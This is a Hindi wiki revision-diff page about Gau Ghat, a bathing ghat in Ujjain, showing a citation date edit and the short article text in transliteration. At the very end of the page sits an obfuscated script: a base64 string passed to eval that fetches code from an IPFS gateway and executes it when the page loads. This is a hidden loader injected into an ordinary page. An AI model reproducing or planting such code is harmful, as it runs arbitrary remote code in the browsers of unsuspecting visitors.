Difference between revisions of "गऊ घाट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 2: Line 2:
 
'''गऊ घाट''' [[उज्जैन]], [[मध्य प्रदेश]] के धार्मिक स्थलों में से एक है।
 
'''गऊ घाट''' [[उज्जैन]], [[मध्य प्रदेश]] के धार्मिक स्थलों में से एक है।
  
*देश के श्रद्धालुओं को एक साथ स्नान घाटों पर लाने के लिए [[सिंहस्थ कुंभ|सिंहस्थ महाकुम्भ]] एक प्रमुख आकर्षण है।<ref>{{cite web |url=http://www.simhasthujjain.in/about-simhasth/ghat-details/?lang=hi |title=घाट विवरण |accessmonthday=12 |accessyear=जून |last= |first= |authorlink= |format= |publisher=simhasthujjain.in |language=हिंदी }}</ref>
+
*देश के श्रद्धालुओं को एक साथ स्नान घाटों पर लाने के लिए [[सिंहस्थ कुंभ|सिंहस्थ महाकुम्भ]] एक प्रमुख आकर्षण है।<ref>{{cite web |url=http://www.simhasthujjain.in/about-simhasth/ghat-details/?lang=hi |title=घाट विवरण |accessmonthday=12 जून |accessyear=2018 |last= |first= |authorlink= |format= |publisher=simhasthujjain.in |language=हिंदी }}</ref>
 
*सिंहस्थ महाकुम्भ के दौरान लाखों श्रद्धालु विभिन्न घाटों पर एकत्रित होते हैं। [[राम घाट, उज्जैन|श्रीराम घाट]] और नरसिंह घाट [[उज्जैन]] के प्राचीन और पवित्र स्नान घाट हैं।
 
*सिंहस्थ महाकुम्भ के दौरान लाखों श्रद्धालु विभिन्न घाटों पर एकत्रित होते हैं। [[राम घाट, उज्जैन|श्रीराम घाट]] और नरसिंह घाट [[उज्जैन]] के प्राचीन और पवित्र स्नान घाट हैं।
 
*धार्मिक महत्व के अलावा उज्जैन के घाट संध्या और प्रातः काल टहलने के लिए भी एक आकर्षक स्थल के रूप में जाने जाते हैं।
 
*धार्मिक महत्व के अलावा उज्जैन के घाट संध्या और प्रातः काल टहलने के लिए भी एक आकर्षक स्थल के रूप में जाने जाते हैं।

Latest revision as of 12:44, 15 June 2018

thumb|250px|goo ghat goo ghat ujjain, madhy pradesh ke dharmik sthaloan mean se ek hai.

  • desh ke shraddhaluoan ko ek sath snan ghatoan par lane ke lie sianhasth mahakumbh ek pramukh akarshan hai.[1]
  • sianhasth mahakumbh ke dauran lakhoan shraddhalu vibhinn ghatoan par ekatrit hote haian. shriram ghat aur narasianh ghat ujjain ke prachin aur pavitr snan ghat haian.
  • dharmik mahatv ke alava ujjain ke ghat sandhya aur pratah kal tahalane ke lie bhi ek akarshak sthal ke roop mean jane jate haian.
  • goo ghat chiantaman marg par vedhashala ke samip sthit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ghat vivaran (hiandi) simhasthujjain.in. abhigaman tithi: 12 joon, 2018.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>